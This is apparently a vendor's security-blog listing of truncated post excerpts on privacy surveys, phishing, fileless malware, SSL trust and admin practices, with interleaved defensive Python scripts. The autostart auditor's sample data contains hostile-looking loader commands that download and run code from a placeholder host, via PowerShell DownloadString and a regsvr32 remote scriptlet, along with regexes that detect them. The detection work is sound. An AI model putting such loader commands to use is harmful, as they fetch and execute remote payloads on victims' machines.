A robust anti-spam solution can be used to block the vast majority (over 99.7%) of spam emails from being delivered. Training users to recognize malware can help to ensure that any rogue emails that get past the filter will be identified and deleted before any damage is...

What are the Main Privacy and Security Concerns of Customers?

A new report released by data privacy and security group Morrison and Foerster indicates the main privacy and security concerns of customers.

Don’t Ignore the Privacy and Security Concerns of Customers
If you ignore the privacy and security concerns of customers, it is likely to have a significant effect on your bottom line. A new report recently released by Morrison and Foerster suggests that consumers are even more concerned about their privacy than they were four years ago. Furthermore, many will take action if they feel their privacy is not protected. The survey indicates more than one in three consumers have switched the companies they do business with due to privacy concerns, and one in five would switch after a breach of their personal data. The company conducted a survey of 900 U.S. consumers in November 2015. 35% of respondents said they had taken the decision to switch companies or not buy products as a result of privacy concerns. When it came to a breach of personal information, 22% of individuals said they had taken the decision to stop purchasing products or had switched services as a result. According to the report, more educated individuals and higher earners were the most likely to stop doing business with a company as a result of a data breach. 28% of respondents educated to college degree level or higher said they would make the switch after a data breach, compared to 18% of individuals without a college degree. For the upper income bracket, 33% said they stopped buying as a result of a data breach. That figure fell to 28% for the middle income bracket, and 17% for the low income bracket. When the company conducted the survey back in 2011, 54% of consumers said that privacy concerns affected their decision to make a purchase. In 2015, 82% of consumers said that privacy concerns influenced their purchasing decisions.
Companies are not perfect, but consumers are intolerant of data breaches
In 2011, 16% of consumers believed no business was perfect, and were therefore likely to overlook privacy issues and data breaches, whereas in 2015 the figure had fallen to 9%. The greatest concern is now the risk of identity theft, with the percentage of individuals worried...

Cybersecurity Predictions for 2016

Over the past four weeks we have seen numerous cybersecurity predictions for 2016 issued by security firms. Security experts are trying to determine which part of the now incredibly broad threat landscape will be most favored by cybercriminals in 2016. Some companies have made very specific cybersecurity predictions for 2016. They have come out with very bold claims, even predicting that the presidential elections will be disrupted by a major cyberattack. Others believe 2016 will be broadly similar to 2015, with just an increase in ransomware attacks and even more massive data breaches suffered. What all of the cybersecurity predictions for 2016 have in common is that the next 12 months are expected to be tough for security professionals. The number and types of devices now connecting to corporate networks are broader than ever before. People are now far more likely to own three or more Internet-connected devices and to use them on a regular basis. Alternative payment methods are being used more frequently. There is now more than ever to attack, and too many devices and systems to keep secure. Unsurprisingly, no one appears to be claiming that 2016 will be easier than last year for cybersecurity professionals.

Cybersecurity predictions for 2016
The attack surface is now incredibly broad, but where are cybercriminals most likely to strike? This is what we think. Here are our cybersecurity predictions for 2016.

IoT – expect attacks on the Internet of Things
Let’s start with a bold prediction. The IoT is likely to come under attack this year. I say bold, but that is only in terms of the timescale. IoT devices will be attacked, shut down, altered, remotely controlled, and used as a launchpad for attacks on other devices. If a device is constantly connected to the Internet, it will only be a matter of time before an attack takes place. One problem with adding IoT technology is that the manufacturers of the devices are not security experts.
A washing machine that can be controlled via Wi-Fi or a Smartphone app, and can be switched on remotely while you are at work, has been designed first and foremost to wash clothes. It has then had IoT functionality bolted on. It has not...

Healthcare Phishing Emails Can Result in Business Crippling Fines

In the United States, healthcare phishing emails are being sent in increasing volume by cybercriminals looking for an easy entry point into insurance and healthcare providers’ networks. Healthcare employees are now being targeted with spear phishing emails as they are seen to be the weakest link in the security chain, and the result is HIPAA compliance breaches. It is, after all, much easier to gain entry to a healthcare network or EHR system if malware is installed by nurses, physicians, or administrative staff than it is to find and exploit server and browser security vulnerabilities. It is even easier if a member of staff can be convinced to divulge their email account or network login credentials. Hackers and cybercriminals are devising ever more sophisticated healthcare phishing emails for this purpose.

Clever healthcare phishing emails could fool any number of staff members
Even well trained IT security professionals have been fooled into responding to phishing scams, so what chance do busy physicians, nurses, and members of the billing department have of identifying healthcare phishing emails? According to the Department of Health and Human Services’ Office for Civil Rights (OCR), employers will be held responsible if their staff fall for a phishing email, unless they have taken proactive steps to reduce the risk of that occurring. This week, OCR announced it had arrived at a settlement with University of Washington Medicine for a 90,000-record data breach that occurred as a result of staff falling for healthcare phishing emails. The settlement involved UWM paying OCR $750,000. Small to medium-sized healthcare organizations could also be fined for members of staff accidentally installing malware. UWM may be able to cover such a substantial fine, but the average 1-10 physician practice would be unlikely to have that sort of spare cash available. Such a penalty could prove to be catastrophic.

Why was such a heavy fine issued?
The issue OCR had with UWM was not the fact that a data breach was suffered, but that insufficient efforts had been made to prevent the breach from occurring. U.S. healthcare legislation requires all healthcare organizations to conduct a...

Kaspersky Lab Makes Web Security Predictions for 2016

Kaspersky Lab has made a number of web security predictions for 2016, alerting IT security professionals to what the company’s security experts believe next year has in store. The company has listed some of the biggest security threats expected over the coming year. Kaspersky Lab is one of the leading anti-virus and anti-malware software developers, and is the supplier of one of the two AV engines at the heart of WebTitan web filtering solutions. The Kaspersky web security predictions for 2016 include opinions gathered from over 40 of the company’s leading experts around the globe. The predictions can be used by IT professionals as a guide to where the next cyberattack could come from.

The Biggest Cyberattacks of 2014 and 2015
Last year saw numerous high profile attacks on some of the world’s best known brands. Around this time last year, Sony was hacked and its confidential data was posted online, causing much embarrassment and considerable financial loss. Some of the biggest names in U.S. retail were attacked in 2014, including Target and Home Depot. The start of this year saw attention switch to health insurers. In February, Anthem Inc. was attacked and the records of 78.8 million insurance subscribers were stolen. News of a cyberattack at Premera BlueCross closely followed; 11 million subscriber records were compromised in that attack. Later in the year, Excellus BlueCross BlueShield discovered hackers had potentially stolen the records of approximately 10 million subscribers. Healthcare providers were also hit. UCLA Health System suffered a data breach that exposed the records of 4.5 million patients. The U.S. Government was also targeted this year. The Office of Personnel Management was hacked and, while the perpetrators have not been identified, the attackers are believed to be government-backed hackers based in China. Over 22 million records were potentially stolen in that cyberattack.
The IRS was also hacked and 300,000 individuals were affected. 37 million highly confidential records were obtained from the internet dating website Ashley Madison, and Hacking Team – a somewhat controversial provider of spyware –...

Amazon Two-Factor Authentication: Enhanced Data Security Measure Added

Online shoppers now have the option of using Amazon two-factor authentication on their accounts to improve security. Any users concerned about the number of cyberattacks being suffered by large retailers should take advantage of the new security measure and add Amazon two-factor authentication to their Amazon account at the earliest possible opportunity. It is not clear exactly when the retail giant implemented the new security feature, as no announcement was made; however, some users started to notice the option this week. At present it is not mandatory to use, but it is strongly advisable to add it to your account. Large retailers are big targets for cybercriminals. Retailers such as Amazon may have invested millions or even hundreds of millions in data security solutions and cybersecurity protections, but no company is impervious to attack. One thing that is certain is that a great many cybercriminals will attempt to break through Amazon’s cybersecurity defenses. The company’s colossal database of customer information would be a sizeable reward for all the effort. The retail giant has an estimated 244 million customers, and 244 million credit card numbers could be sold for a considerable sum of money.

Why Amazon two-factor authentication doesn’t offer 100% security
It would be nice to live in a world where it is impossible to be hacked or have one’s account details compromised. Unfortunately, there is no such thing as a 100% secure account, because no system is totally foolproof. Two-factor authentication does, however, get pretty close and, even better, it is easy for companies to implement and straightforward for customers to activate. Most of the global retailers and major internet brands use two-factor authentication for user accounts, although for some reason (known only to Amazon) the retail giant has refrained from adding this additional security measure until now.
It is not a mandatory security measure and will not be added to accounts automatically. If users want enhanced account security, they can access their account settings and turn it on.

How to Add Amazon two-factor authentication to your account
Making your...

Manage Cybersecurity Risk with Data Protection Policies

In order to manage cybersecurity risk effectively, data protection policies must be developed. However, a new research study conducted by risk and business consulting firm Protiviti suggests that a third of companies have not yet developed data protection policies. Where data protection policies have been implemented, many are insufficient and leave the company vulnerable to a cyberattack.

Data protection policies are inadequate or non-existent in many cases
Over 700 information security professionals and executives were polled and asked about their company’s efforts to keep data secure. Questions were asked about data retention, storage and secure disposal, as well as governance, privacy policies and a wide range of cybersecurity controls. It would appear that many firms are not managing cybersecurity risk effectively, leaving them vulnerable. Information security solutions may have been implemented, but basic controls such as the development and issuing of data protection policies had been neglected. Where policies had been written and implemented, many were insufficient and did not cover even a fraction of the elements necessary to keep systems and data secure. Many security holes were allowed to persist.

To manage cybersecurity risk, start at the top
The board must become involved in cybersecurity decisions and should take a greater interest in keeping the organization secure. Policies must be developed that set rules for the entire organization, and awareness of data and network security must be improved. All members of staff must be made aware of the current threat levels, and a culture of security awareness must be developed. Best practices must be defined, and all users monitored to make sure that those practices are being followed. The study indicates that board level involvement in cybersecurity issues is becoming more common, yet only 28% of survey respondents indicated there was currently a high level of board engagement in such issues.
What is even more worrying is that there has actually been a fall of 2% in high-level engagement year on year. 15% of respondents said board engagement in cybersecurity matters was low, while a third said engagement was at a...

Memory Based Malware: No User Download Required

Think you have to open an infected email attachment or download a file to your computer to acquire a malware infection? Not with the latest memory based malware. Drive-by attacks are taking place that do not need any user interaction. These fileless infections use malware that resides in the computer’s memory, and RAM is not scanned by most anti-virus programs. The good news is that attacks of this nature are rare. The bad news is that this type of malware is increasingly being used by cybercriminals. Fortunately, malware that resides only in memory doesn’t survive a reboot. Unfortunately, by the time your computer is rebooted, you may have already lost your sensitive data. How often do you reboot? At the end of your working day? That could potentially give a hacker a full 8 hours to record your keystrokes or download files to your computer. A lot of damage can be done in 8 hours. There is another problem. Hackers are now creating memory-based malware that actually survives a reboot. The malware has been configured to hook into an API so that, when the computer is restarted, the malware is reloaded into RAM.

Memory-based malware exploits security vulnerabilities in outdated software
If a user is convinced to visit a malicious website, or responds to a spam email containing a link to one of those sites as part of a phishing campaign, their computer can be infected almost immediately. The user is usually directed to a web page containing an exploit kit, the Angler exploit kit for example. Code on the website probes the user’s browser for security vulnerabilities. Security vulnerabilities in Adobe Flash or Adobe Reader could be exploited, or in Java, Silverlight or any number of other plug-ins the user has installed. However, instead of the vulnerability being used to download a file to the hard drive, code is inserted directly into memory. This does not trigger an anti-virus program because no files are written to the computer.
This allows the hacker to perform a drive-by cyberattack, stealing information quickly and silently. That information could include login names, passwords, bank account information, or anything entered via the keyboard. These types of cyberattacks...
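Because the reboot-surviving variants described above keep only a tiny loader in an autostart location, the practical check is to audit those locations for loaders that rebuild code in memory instead of launching an ordinary program. The script below is an added example, not code from the original article: it runs a set of heuristic patterns over autostart command lines. The Run-key entries are constructed for the example (the 192.0.2.x addresses are documentation-range placeholders), and the patterns are heuristics, not a complete signature set.

```python
"""Audit autostart entries for 'fileless' persistence indicators.

Added example, not part of the original article. The entries below are
constructed to resemble Windows Run-key values; in practice you would feed in
the output of an autostart enumeration tool. The patterns are heuristics for
loaders that rebuild a payload in memory rather than launching a normal
executable, and 192.0.2.x is a documentation-range placeholder address.
"""
import re

FILELESS_PATTERNS = [
    ("powershell encoded command",
     re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("powershell download-and-execute",
     re.compile(r"powershell(?:\.exe)?\b.*(?:\biex\b|invoke-expression).*(?:downloadstring|frombase64string)", re.I)),
    ("rundll32 javascript loader",
     re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.I)),
    ("mshta inline script or remote HTA",
     re.compile(r"mshta(?:\.exe)?\s+(?:javascript:|vbscript:|https?://)", re.I)),
    ("regsvr32 remote scriptlet",
     re.compile(r"regsvr32(?:\.exe)?\b.*\s/i:https?://.*\bscrobj\.dll", re.I)),
]

# Constructed sample: three benign entries and four loaders of the kind the
# article describes. Entry names are invented for the example.
SAMPLE_RUN_KEY = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r'C:\Windows\System32\SecurityHealthSystray.exe',
    "NightlyBackup": r'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
    "WindowsUpdater": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval(...)',
    "WinUpdate32": r'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA',
    "Telemetry": r"powershell.exe -w hidden -c iex((New-Object Net.WebClient).DownloadString('http://192.0.2.10/t'))",
    "svchosts": r'regsvr32.exe /s /n /u /i:http://192.0.2.10/a.sct scrobj.dll',
}


def audit_autostart(entries):
    """Return (entry_name, command, reason) for every entry matching a heuristic."""
    findings = []
    for name, command in entries.items():
        for reason, pattern in FILELESS_PATTERNS:
            if pattern.search(command):
                findings.append((name, command, reason))
                break  # one reason per entry is enough for triage
    return findings


def flagged_names(entries):
    """Names of the entries that need a closer look."""
    return {name for name, _, _ in audit_autostart(entries)}


if __name__ == "__main__":
    for name, command, reason in audit_autostart(SAMPLE_RUN_KEY):
        print(f"[{reason}] {name}: {command}")
```

The benign PowerShell entry (a script run from a file on disk) is deliberately left alone: the point is not that script hosts are bad, but that an autostart entry whose payload is an encoded blob, a remote URL or an inline script is exactly the shape a memory-resident loader takes.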

New Mac Internet Scam Warning Issued

Mac users have historically faced fewer attacks than users of computers running Windows. That is not to say it is impossible to inadvertently install a virus or malware on a Mac; it is just that attackers tend to focus on PCs. From an attacker's perspective it pays to infect as many devices as possible, and far more people own PCs than Apple computers. According to research conducted by IDC, sales of Macs have increased by just over 16% this year. However, while accurate figures are difficult to find, approximately 90% of computers run Windows, which makes that operating system by far the more attractive target. If you were an attacker, would you not concentrate on the 90%?

That does not mean Mac users are immune to attack: BlackHole RAT, OS X Pinhead, Mac Flashback and Mac Defender all targeted Mac users. Mac users do face risks and must be cautious online. They may face fewer malware threats, but they can fall for scams just as easily, and phishing websites work just as well on Mac users as on everyone else. Phishing targets the user of the device rather than the device itself, so it does not matter what is being used to access the Internet.

New phishing scam alerts iTunes users to account limitations

Mac users have recently been targeted by a phishing campaign advising iTunes account holders that their accounts have been limited for security reasons. Victims are informed of this by email and provided with a link. If the link is clicked they are taken to a scam site where they must enter information to lift the limitation: a number of data fields must be completed and a credit card number entered. This is an easy scam to spot: even when an account really has been compromised, a service provider would not typically ask for a credit card number to verify identity.
If in doubt, go to your Apple account directly by typing the address into your browser and check whether there is a problem with your account. Never use the link supplied in an email.

Mac Internet scam reported offering urgent tech support

A Mac internet scam warning was recently issued after the discovery of a...

Does a SSL Certificate Mean a Website is Safe to Use?

If you want your employees to browse the Internet safely, you may be tempted to restrict them to websites that present a valid SSL certificate. It is widely believed that SSL certification means a website is secure and can be trusted, but is that true? Does an SSL certificate mean a website is safe to use? The answer is a definite no. HTTPS, or the SSL certificate that enables it, is no guarantee that a website is secure or trustworthy.

Many people believe that an SSL certificate means a website is safe to use. A certificate, or an address starting with HTTPS, does not guarantee that a site is free from malicious code. It means only that the connection to the site is encrypted and that a certificate authority has vouched that the certificate belongs to that domain name; it says nothing about who controls the domain or what they intend to do with your data. In the vast majority of cases the site will be legitimate, just not always. Unfortunately, phishers and other cybercriminals have learned to exploit trust in SSL certificates, and some phishing websites have perfectly valid certificates in place. This means that even when you think your employees have been restricted to safe websites, they are still not protected from phishing sites. Relying on a block on sites that do not use SSL is a mistake, and potentially a very costly one. Restricting access to unencrypted websites is a reasonable step, but further protections are required if you want to be sure that your employees and your network are properly protected.

Selectively block websites at work and take control over the content that your employees can access. See how with a free WebTitan demo.

What is an SSL Certificate?

In short, an SSL certificate is a file, signed by a certificate authority, that binds a public key to a domain name (and, for some certificate types, to the organization that controls it) for the certificate's validity period. When the certificate is installed on a company's web server, browsers can establish encrypted connections to that website, by default over port 443 using the HTTPS protocol. SSL certificates (the protocol is now called TLS, but the name SSL has stuck) are used by websites to secure sessions with web browsers.
You can tell which websites have an SSL certificate in place because a padlock appears next to the web address. This means that the connection to that website is encrypted. The information you enter while connected to the website cannot be read by a third party in transit, and most importantly, it...
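The two pieces above make the same practical point from different angles: the iTunes email says never trust the link, check where it really goes, and this article says HTTPS alone tells you nothing about a site's intent. The following added example (not code from either article) puts both into a link check. It shows the naive "HTTPS only" policy accepting a phishing URL, and a host check that handles the tricks phishing links rely on: a trusted name buried in a subdomain, a trusted name placed in the userinfo part of the URL, and an internationalised look-alike domain. The URLs and the trusted-domain list are constructed for the example, and the "xn--" label stands in for any punycode look-alike.

```python
"""Check whether a link really leads to the site it appears to name.

Added example, not code from the original articles. The trusted-domain list
and the URLs are constructed for the example; the "xn--" label stands in for
any internationalised look-alike domain.
"""
from urllib.parse import urlsplit

TRUSTED_DOMAINS = {"apple.com", "icloud.com"}   # assumption for the example


def https_only_filter(url):
    """The policy the article warns against: accept anything served over HTTPS."""
    return urlsplit(url).scheme.lower() == "https"


def effective_host(url):
    """Lower-cased host the browser would actually connect to.

    urlsplit().hostname drops the userinfo part ("apple.com@evil.example") and
    the port, which is exactly what a human eye tends not to do.
    """
    host = urlsplit(url).hostname
    return host.lower().rstrip(".") if host else ""


def is_trusted_host(host, trusted=TRUSTED_DOMAINS):
    """True only for a trusted domain or a genuine subdomain of one.

    A substring test would accept "apple.com.evil.example"; matching on a
    label boundary does not.
    """
    return any(host == d or host.endswith("." + d) for d in trusted)


def classify_link(url, trusted=TRUSTED_DOMAINS):
    """Return a verdict for a link found in an email."""
    parts = urlsplit(url)
    host = effective_host(url)
    if not host:
        return "reject: no host"
    if parts.scheme.lower() != "https":
        return "reject: not HTTPS"
    if parts.username is not None:
        # "https://apple.com@verify-account.example/": the eye reads apple.com,
        # the browser connects to verify-account.example.
        return f"reject: decoy name in URL, real host is {host}"
    if not host.isascii() or any(label.startswith("xn--") for label in host.split(".")):
        return f"reject: look-alike (internationalised) host {host}"
    if is_trusted_host(host, trusted):
        return f"accept: trusted host {host}"
    return f"reject: untrusted host {host}"


if __name__ == "__main__":
    for link in (
        "https://www.apple.com/account",
        "https://appleid.apple.com.verify-account.example/login",
        "https://apple.com@verify-account.example/",
        "http://www.apple.com/",
        "https://www.xn--pple-43d.com/",
    ):
        print(f"https-only says {https_only_filter(link)!s:5}  check says {classify_link(link)}")
```

Note that the phishing-style URL in the second line passes the HTTPS-only filter: a certificate for verify-account.example is cheap and legitimate for whoever registered that domain, which is precisely why the scheme and padlock alone are not a trust signal.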

Customers Warned of TalkTalk Hacking Scams as Data are Sold on Dark Net Websites

British mobile phone and broadband provider TalkTalk discovered late last month that it had been hacked; however, further information has since emerged suggesting that TalkTalk hacking scams are increasing in number. Over a million customers' data are apparently being offered for sale on dark net websites, and criminals are already using the data to defraud victims. It was initially believed that over four million customers had been affected, although it is now understood that not all of the company's customers were affected. A criminal investigation was launched a few days after the hack was discovered. Initial reports suggested that an Islamic terrorist group from Russia was behind the attack, having publicly claimed responsibility; that claim appears to be false. The Metropolitan Police Cyber Crime Unit acted fast, and just a few days after the attack was announced a 15-year-old boy was arrested in Northern Ireland on suspicion of being behind it. A few days later a second arrest was made, this time of a 16-year-old boy from West London. A 20-year-old was arrested in Staffordshire in connection with the hack, and now a fourth individual has been arrested: a 16-year-old boy from Norwich has been detained.

1.2 million email addresses obtained by the hackers

The official figures released by TalkTalk are much lower than the initial estimates, but the hack still ranks as one of the biggest UK hacking scandals reported in recent years. A statement released by the company revealed that approximately 1.2 million email addresses had been obtained in the attack, that customer names and phone numbers were also stolen, and that 21,000 bank account numbers and sort codes were accessed and presumed stolen. A later press release put the number of individuals affected at 156,959, explaining that the earlier, larger figure referred to "bits of data" (email addresses, names and phone numbers) rather than to individuals.
Partial credit card numbers were also compromised, but since the complete numbers were not exposed there does not appear to be a risk of them being used to make payments. That is not to say the data are useless: phishers may well devise campaigns to obtain the remaining digits from...

Awareness of Security Threats is a Cause for Concern

A new study conducted by CompTIA has highlighted the risks being taken by end users and suggests low awareness of security threats. End users' lack of knowledge of basic security measures continually frustrates IT security professionals. End users are usually seen as the weakest link in the security chain, and the results of this study are unlikely to change many minds. The study also suggested that the people most likely to take risks and jeopardize security are in their early twenties: Gen Y.

Gen Y Has Low Awareness of Security Threats

One of the tests conducted was a straightforward but ingenious test of risk awareness. CompTIA researchers dropped 200 unmarked thumb drives in locations with high volumes of foot traffic to find out how many people would pick up a drive and plug it into their computer. Thumb drives are cheap but extremely useful, and finding one in the street may look like a lucky find. However, plugging an unknown drive into a computer carries a huge risk: there is no knowing what is on the drive, or even whether it is really just a storage device, and simply connecting it could result in malware being installed. In this case, doing so only displayed a pop-up message prompting the new owner to send an email to the researchers letting them know the device had been found and plugged in. In total, 17% of the 200 thumb drives resulted in a response. Not everyone who plugged in a drive will have responded to that request, so the number who did plug one in may well have been higher. The company also conducted a survey to discover more about end user awareness of security threats.
Over 1,200 completed surveys were collected, and the results show that many end users are taking considerable security risks that could result in laptops, computers and mobile phones being compromised. If IT security professionals were worried about end user risk-taking before, they are likely to be even more...

Liability for Employee Internet Usage

Liability for Employee Internet Usage: Can an Employer be Liable for an Employee's Online Activity?

There are numerous benefits to allowing employees access to the Internet. Information can be found quickly, contacts developed, new suppliers located, products purchased and research conducted, among many other things. Unfortunately, providing Internet access to employees occasionally leads to abuse. An employee could use the Internet to access personal gambling accounts and play online poker at work, or use social media excessively. Individuals can and do view pornography at work. Threats and disparaging comments may be posted online. Add to that list illegal file sharing, hacking of other corporations and illegally accessing databases. There are plenty of other ways of abusing Internet access and, if it can be done, an employee somewhere will already have done it.

These acts are committed by only a minority of employees, and they rarely cause an employer, co-worker or other individual to come to any harm. However, that is not always the case. Should harm occur, or should an employee break the law, the employer could be found liable for the employee's actions. There have been a number of cases in which employers have been found liable for the actions of employees, for example when those actions adversely affected work colleagues. Some of the most common grounds for lawsuits have been sexual harassment of co-workers, threats of violence, racial harassment and discrimination.

Respondeat superior: Employer Liability for the actions of an employee

The legal term for an employer's vicarious liability for actions committed by an employee is respondeat superior. This is nothing new; it has been part of the law for well over 100 years.
Today, respondeat superior is not confined to things said or done in person; it also applies to actions committed using email and to abuse of the Internet. Nor is it limited to actions against co-workers. Liability for employee Internet usage may result from comments posted on forums. Typically, an employer would...

Your Favorite Coffee Shop Filters its Coffee, but not Internet Access

Visiting a coffee shop for a caffeine fix usually means the opportunity to save some mobile data by connecting to a free Wi-Fi network. In fact, a coffee shop without free Wi-Fi is unlikely to be anywhere near as busy as those offering patrons free Internet access. Airports, restaurants, shopping centers and many pubs also let visitors connect to their Wi-Fi for free. Many freelance workers head to cafes for a full day's work, while others just check email or surf the Internet. Connecting to someone else's Wi-Fi is convenient and saves money. However, as many people discover, it may not be quite as free as they think. Connecting to free Wi-Fi hotspots carries considerable risks, and there may be a considerable cost: identity theft and an emptied bank account.

The importance of a secure Wi-Fi connection

Many free Wi-Fi networks allow any user within range to connect without even having to register. These open networks really are open to anyone, and that includes criminals. Traffic on an open network is not encrypted over the air, so anyone within radio range with the inclination and a modicum of technical skill can inspect it: they could see which websites are visited, read emails sent over unencrypted connections, and even capture login names and passwords submitted to sites that do not use HTTPS. Tampering with that traffic to push malware at connecting devices is also possible.

Not all Wi-Fi networks are open. Some coffee shops and hotspots require users to identify themselves, with access granted only to those who log in using a password or token given to customers who create an account. Be clear about what that does and does not buy you. A login page (a captive portal) on an otherwise open network does not encrypt anything; it only controls who gets Internet access. Only a network protected with WPA2 encrypts traffic over the air, and even then every customer shares the same password, so a determined attacker who knows it can still recover other users' traffic. These controls make a network safer; they do not make it entirely secure.
If operators of public Wi-Fi networks really want to protect their users from the myriad viruses and malware on the Internet, additional security controls should be employed. One of the best options in this regard...

5 Security Errors Often Made by System Administrators

Most system administrators have a rather long to-do list. As soon as one item is cleared, another two seem to take its place. Often there are simply not enough hours in the day to deal with every issue. There are software problems, hardware problems and user problems, and it can be hard to find time to be proactive rather than reactive. We would like to make your job easier and reduce the number of items on your future to-do lists. With this in mind we have listed five mistakes to avoid to prevent future headaches. They are basic, but that is exactly why many system administrators overlook them.

Network Security No-No's

Never host anything other than Active Directory on a domain controller

Active Directory looks after the identities and relationships of your network and allows you to provide all employees with single sign-on (SSO) access. It is therefore important that Active Directory is isolated and that the machine running it is used for nothing else. Do not mix up your assets: in the event of one being compromised, anything else hosted on the same machine is likely to be compromised too, and an attacker who has gained access to a server will have a snoop around to see what else is running on it. Keep everything separate and you limit the damage a breach can cause.

Don't log on to a workstation with your administrator credentials

If your administrator credentials are compromised, a malicious insider or outsider gains access to systems where a great deal of damage can be done. If you log on to a compromised workstation with a domain administrator account, you could be handing your access rights to an attacker: credentials cached or held in memory on that workstation are not difficult to extract, and publicly available tools let an attacker who already has local administrator rights on the machine reuse them to obtain domain administrator privileges. If that happens, an attacker really can unleash hell.
Don't ever reuse passwords

One of the most elementary data security measures is to ensure passwords are impossible to guess. In the unlikely event that your password is guessed or otherwise compromised, it is essential that it cannot be used to access any other...
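The rule about not logging on to workstations with administrator credentials is easy to state and easy to break, so it is worth checking the logs for it. The script below is an added example, not code from the original article. It runs over constructed records shaped like Windows Security event 4624 (successful logon) as a log collector might export them, and flags interactive logons (console and RDP) by privileged accounts to machines that are not servers. The privileged-account list and the "WS-" workstation naming convention are assumptions for the example; adapt both to your environment.

```python
"""Flag domain-admin logons to ordinary workstations.

Added example, not from the original article. The records are constructed to
resemble Windows Security event 4624 (successful logon) as exported by a log
collector; the privileged-account list and the "WS-" workstation naming
convention are assumptions for the example.
"""
from collections import Counter

# Logon types that create a full session on the target machine and leave
# credential material in memory there: 2 = Interactive (console),
# 10 = RemoteInteractive (RDP). A network logon (type 3) does not, so it is
# not flagged.
RISKY_LOGON_TYPES = {2, 10}

PRIVILEGED_ACCOUNTS = {"da-jsmith", "administrator"}   # assumption

# Constructed sample events. Only the first and third should be flagged.
SAMPLE_EVENTS = [
    {"TimeCreated": "2015-11-02T08:14:03", "EventID": 4624, "LogonType": 2,
     "TargetUserName": "da-jsmith", "Computer": "WS-FIN-042", "IpAddress": "-"},
    {"TimeCreated": "2015-11-02T08:20:41", "EventID": 4624, "LogonType": 3,
     "TargetUserName": "da-jsmith", "Computer": "WS-FIN-042", "IpAddress": "10.0.5.12"},
    {"TimeCreated": "2015-11-02T09:02:17", "EventID": 4624, "LogonType": 10,
     "TargetUserName": "DA-JSMITH", "Computer": "WS-HR-007", "IpAddress": "10.0.5.12"},
    {"TimeCreated": "2015-11-02T09:05:55", "EventID": 4624, "LogonType": 10,
     "TargetUserName": "da-jsmith", "Computer": "DC01", "IpAddress": "10.0.5.12"},
    {"TimeCreated": "2015-11-02T09:10:30", "EventID": 4624, "LogonType": 2,
     "TargetUserName": "jsmith", "Computer": "WS-FIN-042", "IpAddress": "-"},
    {"TimeCreated": "2015-11-02T09:12:09", "EventID": 4625, "LogonType": 2,
     "TargetUserName": "administrator", "Computer": "WS-FIN-042", "IpAddress": "-"},
]


def is_workstation(computer):
    """Assumed naming convention: workstations are named WS-<site>-<number>."""
    return computer.upper().startswith("WS-")


def flag_admin_workstation_logons(events, privileged=PRIVILEGED_ACCOUNTS):
    """Return the successful logons where a privileged account opened an
    interactive session on a workstation."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4624:            # successful logons only
            continue
        if ev.get("LogonType") not in RISKY_LOGON_TYPES:
            continue
        if ev.get("TargetUserName", "").lower() not in privileged:
            continue
        if is_workstation(ev.get("Computer", "")):
            hits.append(ev)
    return hits


def logons_per_account(hits):
    """Count flagged logons per account (lower-cased) for a daily report."""
    return dict(Counter(ev["TargetUserName"].lower() for ev in hits))


if __name__ == "__main__":
    flagged = flag_admin_workstation_logons(SAMPLE_EVENTS)
    for ev in flagged:
        print(f"{ev['TimeCreated']} {ev['TargetUserName']} type {ev['LogonType']} -> {ev['Computer']}")
    print(logons_per_account(flagged))
```

The type 3 logon to the same workstation is deliberately not flagged: a network logon does not leave the administrator's credentials on the machine, which is what makes the interactive and RDP cases the dangerous ones.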

Beware of Social Engineering Scams

There has been a lot of talk recently about social engineering scams, but what is social engineering? Social engineering is a term used in social science to describe the psychological manipulation of people into taking a particular action, and the influencing of large groups of people. It is a technique used for good and for bad: politicians and governments use social engineering, and advertisers use it to convince the public to buy products. In recent months, most talk of social engineering has concerned information security. Hackers and other online criminals use social engineering techniques to get Internet users to reveal sensitive information such as login names and passwords, and even credit card numbers and bank account details. The majority of large-scale data breaches caused by hackers and malicious outsiders are found to involve an element of social engineering. How can you protect yourself from being manipulated into revealing information? How can you protect your company from employees falling for social engineering scams?

How is Social Engineering Used by Cybercriminals?

The commonest methods employed by cybercriminals to manipulate users into taking certain actions are detailed below. Being aware of how social engineering is used will help you protect yourself and your employees from scams and phishing campaigns.

Abuse of Trust: Online criminals know that it is far easier to get what they want if they pretend to be someone the target trusts; people are wary of strangers, after all. If a total stranger came up to you in the street and asked for your PIN or your email address and password, you would naturally refuse. On the Internet, however, it is not always so easy to tell whether someone really is a stranger, and a seemingly legitimate reason for disclosing the information is usually supplied.
Emails sent from colleagues, friends and family members

If you receive an email from someone you trust, you are more likely to respond to a request than if the same email had been sent by a stranger. If a...

How to Deal with Insider Threats: A Common Sense Approach

Beware the threat from within: How to deal with insider threats

IT security professionals and C-suite executives are well aware of the threat from hackers. Cyberattacks have been all over the news recently, and major security breaches have resulted in millions of records being stolen. Patient health records were targeted in the cyberattack on Anthem Inc., the largest healthcare data breach ever recorded. That attack, discovered in February this year, involved the theft of 78.8 million health insurance subscriber records. Target was attacked last year, and hackers obtained the payment card and personal details of an estimated 110 million customers. The finance industry was also hit hard in 2014, with 83 million J.P. Morgan Chase accounts compromised.

Cybersecurity defenses naturally need to be put in place, monitored and bolstered to deal with an ever-changing threat landscape. However, it is important not to forget the threat from within. Malicious insiders can be just as dangerous as hackers, and often more so. Just ask the NSA, which knows all too well how dangerous insiders can be: Edward Snowden managed to take and release data that caused considerable embarrassment. In his case, he wanted the world to know what the NSA was up to, and the NSA had gone to great lengths to make sure that what happened behind its walls stayed secret.

Malicious insiders are often individuals who have legitimately been given access to patient and customer records, corporate intellectual property, company secrets, product development information and employee databases. They are therefore potentially able to steal everything, and the harm they can cause is considerable. Nor is theft of data the only problem: insiders may use their access to defraud their employers, destroy data, or install malware and ransomware.
Unfortunately, tackling the threat from within is much more difficult than preventing external attacks. Bear in mind that insiders are not necessarily employees; they can include business partners and associates, contractors and past employees. Which insiders pose the biggest threat...

Habits Developed by the Best System Administrators

